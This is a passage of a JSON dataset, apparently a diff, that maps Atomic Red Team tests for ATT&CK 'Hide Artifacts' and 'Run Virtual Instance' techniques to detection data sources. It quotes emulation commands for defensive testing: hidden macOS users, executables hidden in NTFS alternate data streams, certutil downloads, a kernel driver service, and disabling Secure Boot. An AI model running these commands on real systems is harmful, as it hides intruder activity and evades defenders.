"supported_platforms": [ + "macos" + ], + "input_arguments": { + "user_name": { + "description": "username to add", + "type": "String", + "default": "APT" + } + }, + "executor": { + "command": "sudo dscl . -create /Users/#{user_name} IsHidden 1\n", + "cleanup_command": "sudo dscl . -delete /Users/#{user_name}\n", + "elevation_required": true, + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account creation", + "description": "A user account was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account metadata", + "description": "Data and information that describe a user account and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "user" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1564.003", + "command_list": [ + "Start-Process powershell.exe -WindowStyle hidden calc.exe\n" + ], + "commands": [ + { + "command": "Start-Process powershell.exe -WindowStyle hidden calc.exe\n", + "source": "atomics/T1564.003/T1564.003.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Window" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1564.003", + "display_name": "Hide Artifacts: Hidden Window", + "atomic_tests": [ + { + "name": "Hidden Window", + "auto_generated_guid": 
"f151ee37-9e2b-47e6-80e4-550b9f999b7a", + "description": "Launch PowerShell with the \"-WindowStyle Hidden\" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden.\nUpon execution a hidden PowerShell window will launch calc.exe\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "powershell_command": { + "description": "Command to launch calc.exe from a hidden PowerShell Window", + "type": "String", + "default": "powershell.exe -WindowStyle hidden calc.exe" + } + }, + "executor": { + "command": "Start-Process #{powershell_command}\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" 
+ }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + 
"relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + 
"https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1564.004", + "command_list": [ + "type C:\\temp\\evil.exe > \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer12_Logfile.log:evil.exe\"\nextrac32 c:\\ADS\\\\procexp.cab c:\\ADS\\\\file.txt:procexp.exe\nfindstr /V /L W3AllLov3DonaldTrump c:\\ADS\\\\procexp.exe > c:\\ADS\\\\file.txt:procexp.exe\ncertutil.exe -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1564.004/src/test.ps1 c:\\temp:ttt\nmakecab c:\\ADS\\\\autoruns.exe c:\\ADS\\\\cabtest.txt:autoruns.cab\nprint /D:c:\\ADS\\\\file.txt:autoruns.exe c:\\ADS\\\\Autoruns.exe\nreg export HKLM\\SOFTWARE\\Microsoft\\Evilreg c:\\ADS\\\\file.txt:evilreg.reg\nregedit /E c:\\ADS\\\\file.txt:regfile.reg HKEY_CURRENT_USER\\MyCustomRegKey\nexpand \\\\webdav\\folder\\file.bat c:\\ADS\\\\file.txt:file.bat\nesentutl.exe /y c:\\ADS\\\\autoruns.exe /d c:\\ADS\\\\file.txt:autoruns.exe /o \n", + "if (!(Test-Path C:\\Users\\Public\\Libraries\\yanki -PathType Container)) {\n New-Item -ItemType Directory -Force -Path C:\\Users\\Public\\Libraries\\yanki\n }\nStart-Process -FilePath \"$env:comspec\" -ArgumentList \"/c,type,c:\\windows\\system32\\cmd.exe,>,`\"#{ads_file_path}:#{ads_name}`\"\"\n", + "if (!(Test-Path C:\\Users\\Public\\Libraries\\yanki -PathType Container)) {\n New-Item -ItemType Directory -Force -Path C:\\Users\\Public\\Libraries\\yanki\n }\nStart-Process -FilePath \"$env:comspec\" -ArgumentList \"/c,type,#{payload_path},>,`\"C:\\Users\\Public\\Libraries\\yanki\\desktop.ini:#{ads_name}`\"\"\n", + "if (!(Test-Path C:\\Users\\Public\\Libraries\\yanki -PathType Container)) {\n New-Item -ItemType Directory -Force -Path C:\\Users\\Public\\Libraries\\yanki\n }\nStart-Process -FilePath \"$env:comspec\" -ArgumentList \"/c,type,#{payload_path},>,`\"#{ads_file_path}:desktop.ini`\"\"\n", + "echo cmd /c echo \"Shell code execution.\"> 
%temp%\\T1564.004_has_ads_cmd.txt:#{ads_filename}\nfor /f \"usebackq delims=?\" %i in (%temp%\\T1564.004_has_ads_cmd.txt:#{ads_filename}) do %i\n", + "echo cmd /c echo \"Shell code execution.\"> #{file_name}:adstest.txt\nfor /f \"usebackq delims=?\" %i in (#{file_name}:adstest.txt) do %i\n", + "echo \"test\" > $env:TEMP\\T1564.004_has_ads_powershell.txt | set-content -path test.txt -stream #{ads_filename} -value \"test\"\nset-content -path $env:TEMP\\T1564.004_has_ads_powershell.txt -stream #{ads_filename} -value \"test2\"\nset-content -path . -stream #{ads_filename} -value \"test3\"\n", + "echo \"test\" > #{file_name} | set-content -path test.txt -stream adstest.txt -value \"test\"\nset-content -path #{file_name} -stream adstest.txt -value \"test2\"\nset-content -path . -stream adstest.txt -value \"test3\"\n" + ], + "commands": [ + { + "command": "type C:\\temp\\evil.exe > \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer12_Logfile.log:evil.exe\"\nextrac32 c:\\ADS\\\\procexp.cab c:\\ADS\\\\file.txt:procexp.exe\nfindstr /V /L W3AllLov3DonaldTrump c:\\ADS\\\\procexp.exe > c:\\ADS\\\\file.txt:procexp.exe\ncertutil.exe -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1564.004/src/test.ps1 c:\\temp:ttt\nmakecab c:\\ADS\\\\autoruns.exe c:\\ADS\\\\cabtest.txt:autoruns.cab\nprint /D:c:\\ADS\\\\file.txt:autoruns.exe c:\\ADS\\\\Autoruns.exe\nreg export HKLM\\SOFTWARE\\Microsoft\\Evilreg c:\\ADS\\\\file.txt:evilreg.reg\nregedit /E c:\\ADS\\\\file.txt:regfile.reg HKEY_CURRENT_USER\\MyCustomRegKey\nexpand \\\\webdav\\folder\\file.bat c:\\ADS\\\\file.txt:file.bat\nesentutl.exe /y c:\\ADS\\\\autoruns.exe /d c:\\ADS\\\\file.txt:autoruns.exe /o \n", + "source": "atomics/T1564.004/T1564.004.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: NTFS File Attributes" + }, + { + "command": "if (!(Test-Path C:\\Users\\Public\\Libraries\\yanki -PathType Container)) {\n New-Item -ItemType Directory -Force -Path 
C:\\Users\\Public\\Libraries\\yanki\n }\nStart-Process -FilePath \"$env:comspec\" -ArgumentList \"/c,type,c:\\windows\\system32\\cmd.exe,>,`\"#{ads_file_path}:#{ads_name}`\"\"\n", + "source": "atomics/T1564.004/T1564.004.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: NTFS File Attributes" + }, + { + "command": "if (!(Test-Path C:\\Users\\Public\\Libraries\\yanki -PathType Container)) {\n New-Item -ItemType Directory -Force -Path C:\\Users\\Public\\Libraries\\yanki\n }\nStart-Process -FilePath \"$env:comspec\" -ArgumentList \"/c,type,#{payload_path},>,`\"C:\\Users\\Public\\Libraries\\yanki\\desktop.ini:#{ads_name}`\"\"\n", + "source": "atomics/T1564.004/T1564.004.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: NTFS File Attributes" + }, + { + "command": "if (!(Test-Path C:\\Users\\Public\\Libraries\\yanki -PathType Container)) {\n New-Item -ItemType Directory -Force -Path C:\\Users\\Public\\Libraries\\yanki\n }\nStart-Process -FilePath \"$env:comspec\" -ArgumentList \"/c,type,#{payload_path},>,`\"#{ads_file_path}:desktop.ini`\"\"\n", + "source": "atomics/T1564.004/T1564.004.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: NTFS File Attributes" + }, + { + "command": "echo cmd /c echo \"Shell code execution.\"> %temp%\\T1564.004_has_ads_cmd.txt:#{ads_filename}\nfor /f \"usebackq delims=?\" %i in (%temp%\\T1564.004_has_ads_cmd.txt:#{ads_filename}) do %i\n", + "source": "atomics/T1564.004/T1564.004.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: NTFS File Attributes" + }, + { + "command": "echo cmd /c echo \"Shell code execution.\"> #{file_name}:adstest.txt\nfor /f \"usebackq delims=?\" %i in (#{file_name}:adstest.txt) do %i\n", + "source": "atomics/T1564.004/T1564.004.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: NTFS File Attributes" + }, + { + "command": "echo \"test\" > $env:TEMP\\T1564.004_has_ads_powershell.txt | set-content -path test.txt -stream #{ads_filename} -value \"test\"\nset-content -path 
$env:TEMP\\T1564.004_has_ads_powershell.txt -stream #{ads_filename} -value \"test2\"\nset-content -path . -stream #{ads_filename} -value \"test3\"\n", + "source": "atomics/T1564.004/T1564.004.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: NTFS File Attributes" + }, + { + "command": "echo \"test\" > #{file_name} | set-content -path test.txt -stream adstest.txt -value \"test\"\nset-content -path #{file_name} -stream adstest.txt -value \"test2\"\nset-content -path . -stream adstest.txt -value \"test3\"\n", + "source": "atomics/T1564.004/T1564.004.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: NTFS File Attributes" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1564.004", + "display_name": "Hide Artifacts: NTFS File Attributes", + "atomic_tests": [ + { + "name": "Alternate Data Streams (ADS)", + "auto_generated_guid": "8822c3b0-d9f9-4daf-a043-49f4602364f4", + "description": "Execute from Alternate Streams\n\n[Reference - 1](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)\n\n[Reference - 2](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "path": { + "description": "Path of ADS file", + "type": "Path", + "default": "c:\\ADS\\" + } + }, + "executor": { + "command": "type C:\\temp\\evil.exe > \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer12_Logfile.log:evil.exe\"\nextrac32 #{path}\\procexp.cab #{path}\\file.txt:procexp.exe\nfindstr /V /L W3AllLov3DonaldTrump #{path}\\procexp.exe > #{path}\\file.txt:procexp.exe\ncertutil.exe -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1564.004/src/test.ps1 c:\\temp:ttt\nmakecab #{path}\\autoruns.exe #{path}\\cabtest.txt:autoruns.cab\nprint /D:#{path}\\file.txt:autoruns.exe #{path}\\Autoruns.exe\nreg export HKLM\\SOFTWARE\\Microsoft\\Evilreg #{path}\\file.txt:evilreg.reg\nregedit /E #{path}\\file.txt:regfile.reg 
HKEY_CURRENT_USER\\MyCustomRegKey\nexpand \\\\webdav\\folder\\file.bat #{path}\\file.txt:file.bat\nesentutl.exe /y #{path}\\autoruns.exe /d #{path}\\file.txt:autoruns.exe /o \n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Store file in Alternate Data Stream (ADS)", + "auto_generated_guid": "2ab75061-f5d5-4c1a-b666-ba2a50df5b02", + "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.\nUpon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "payload_path": { + "description": "Path of file to hide in ADS", + "type": "Path", + "default": "c:\\windows\\system32\\cmd.exe" + }, + "ads_file_path": { + "description": "Path of file to create an ADS under", + "type": "Path", + "default": "C:\\Users\\Public\\Libraries\\yanki\\desktop.ini" + }, + "ads_name": { + "description": "Name of ADS", + "type": "String", + "default": "desktop.ini" + } + }, + "executor": { + "command": "if (!(Test-Path C:\\Users\\Public\\Libraries\\yanki -PathType Container)) {\n New-Item -ItemType Directory -Force -Path C:\\Users\\Public\\Libraries\\yanki\n }\nStart-Process -FilePath \"$env:comspec\" -ArgumentList \"/c,type,#{payload_path},>,`\"#{ads_file_path}:#{ads_name}`\"\"\n", + "cleanup_command": "Remove-Item \"#{ads_file_path}\" -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Create ADS command prompt", + "auto_generated_guid": "17e7637a-ddaf-4a82-8622-377e20de8fdb", + "description": "Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run \"dir /a-d /s /r | find \":$DATA\"\" in the %temp%\nfolder to view that the alternate data stream exists. 
To view the data in the alternate data stream, run \"notepad T1564.004_has_ads.txt:adstest.txt\"\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_name": { + "description": "File name of file to create ADS on.", + "type": "String", + "default": "%temp%\\T1564.004_has_ads_cmd.txt" + }, + "ads_filename": { + "description": "Name of ADS.", + "type": "String", + "default": "adstest.txt" + } + }, + "executor": { + "command": "echo cmd /c echo \"Shell code execution.\"> #{file_name}:#{ads_filename}\nfor /f \"usebackq delims=?\" %i in (#{file_name}:#{ads_filename}) do %i\n", + "cleanup_command": "del #{file_name} >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Create ADS PowerShell", + "auto_generated_guid": "0045ea16-ed3c-4d4c-a9ee-15e44d1560d1", + "description": "Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command \"ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname\"\nin the %temp% direcotry to view all files with hidden data streams. 
To view the data in the alternate data stream, run \"notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt\" in the %temp% folder.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_name": { + "description": "File name of file to create ADS on.", + "type": "String", + "default": "$env:TEMP\\T1564.004_has_ads_powershell.txt" + }, + "ads_filename": { + "description": "Name of ADS file.", + "type": "String", + "default": "adstest.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The file must exist on disk at specified location (#{file_name})\n", + "prereq_command": "if (Test-Path #{file_name}) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "New-Item -Path #{file_name} | Out-Null\n" + } + ], + "executor": { + "command": "echo \"test\" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value \"test\"\nset-content -path #{file_name} -stream #{ads_filename} -value \"test2\"\nset-content -path . 
-stream #{ads_filename} -value \"test3\"\n", + "cleanup_command": "Remove-Item -Path #{file_name} -ErrorAction Ignore\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + 
"https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1564.006", + "command_list": [ + "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxSVC.exe\" /reregserver\nregsvr32 /S \"C:\\Program Files\\Oracle\\VirtualBox\\VboxC.dll\"\nrundll32 \"C:\\Program Files\\Oracle\\VirtualBox\\VBoxRT.dll,RTR3Init\"\nsc create VBoxDRV binpath= \"C:\\Program Files\\Oracle\\VirtualBox\\drivers\\VboxDrv.sys\" type= kernel start= auto error= normal displayname= PortableVBoxDRV\nsc start VBoxDRV\n", + "\"#{vboxmanage_exe}\" createvm --name \"Atomic VM\" --register\n\"#{vboxmanage_exe}\" modifyvm \"Atomic VM\" --firmware efi\n\"#{vboxmanage_exe}\" startvm \"Atomic VM\"\n", + "\"#{vboxmanage_exe}\" createvm --name \"#{vm_name}\" --register\n\"#{vboxmanage_exe}\" modifyvm \"#{vm_name}\" --firmware efi\n\"#{vboxmanage_exe}\" startvm \"#{vm_name}\"\n", + "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxManage.exe\" createvm --name \"#{vm_name}\" --register\n\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxManage.exe\" modifyvm \"#{vm_name}\" --firmware efi\n\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxManage.exe\" startvm \"#{vm_name}\"\n", + "$VM = \"Atomic VM\"\nNew-VM -Name $VM -Generation 2\nSet-VMFirmware $VM -EnableSecureBoot Off\nStart-VM $VM" + ], + "commands": [ + { + "command": "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxSVC.exe\" /reregserver\nregsvr32 /S \"C:\\Program Files\\Oracle\\VirtualBox\\VboxC.dll\"\nrundll32 \"C:\\Program Files\\Oracle\\VirtualBox\\VBoxRT.dll,RTR3Init\"\nsc create VBoxDRV binpath= \"C:\\Program Files\\Oracle\\VirtualBox\\drivers\\VboxDrv.sys\" type= kernel start= auto error= normal displayname= PortableVBoxDRV\nsc start VBoxDRV\n", + "source": "atomics/T1564.006/T1564.006.yaml", + "name": "Atomic Red Team Test - Run Virtual Instance" + }, + { + "command": "\"#{vboxmanage_exe}\" createvm --name \"Atomic VM\" --register\n\"#{vboxmanage_exe}\" modifyvm \"Atomic VM\" 
--firmware efi\n\"#{vboxmanage_exe}\" startvm \"Atomic VM\"\n", + "source": "atomics/T1564.006/T1564.006.yaml", + "name": "Atomic Red Team Test - Run Virtual Instance" + }, + { + "command": "\"#{vboxmanage_exe}\" createvm --name \"#{vm_name}\" --register\n\"#{vboxmanage_exe}\" modifyvm \"#{vm_name}\" --firmware efi\n\"#{vboxmanage_exe}\" startvm \"#{vm_name}\"\n", + "source": "atomics/T1564.006/T1564.006.yaml", + "name": "Atomic Red Team Test - Run Virtual Instance" + }, + { + "command": "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxManage.exe\" createvm --name \"#{vm_name}\" --register\n\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxManage.exe\" modifyvm \"#{vm_name}\" --firmware efi\n\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxManage.exe\" startvm \"#{vm_name}\"\n", + "source": "atomics/T1564.006/T1564.006.yaml", + "name": "Atomic Red Team Test - Run Virtual Instance" + }, + { + "command": "$VM = \"Atomic VM\"\nNew-VM -Name $VM -Generation 2\nSet-VMFirmware $VM -EnableSecureBoot Off\nStart-VM $VM", + "source": "atomics/T1564.006/T1564.006.yaml", + "name": "Atomic Red Team Test - Run Virtual Instance" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1564.006", + "display_name": "Run Virtual Instance", + "atomic_tests": [ + { + "name": "Register Portable Virtualbox", + "auto_generated_guid": "c59f246a-34f8-4e4d-9276-c295ef9ba0dd", + "description": "ransomware payloads via virtual machines (VM). 
\n[Maze ransomware](https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_file_path": { + "description": "Path to the MSI file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1564.006\\bin\\Virtualbox_52.msi" + }, + "cab_file_path": { + "description": "Path to the CAB file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1564.006\\bin\\common.cab" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "MSI file must exist on disk at specified location (#{msi_file_path})\n", + "prereq_command": "if (Test-Path #{msi_file_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{msi_file_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi\" -OutFile \"#{msi_file_path}\"\n" + }, + { + "description": "CAB file must exist on disk at specified location (#{cab_file_path})\n", + "prereq_command": "if (Test-Path #{cab_file_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{cab_file_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab\" -OutFile \"#{cab_file_path}\" \n" + }, + { + "description": "Old version of Virtualbox must be installed\n", + "prereq_command": "if (Test-Path \"C:\\Program Files\\Oracle\\VirtualBox\\VboxC.dll\") {exit 0} else {exit 1}\n", + "get_prereq_command": "msiexec /i #{msi_file_path} /qn\n" + } + ], + "executor": { + "command": "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxSVC.exe\" /reregserver\nregsvr32 /S \"C:\\Program Files\\Oracle\\VirtualBox\\VboxC.dll\"\nrundll32 \"C:\\Program Files\\Oracle\\VirtualBox\\VBoxRT.dll,RTR3Init\"\nsc create VBoxDRV binpath= \"C:\\Program 
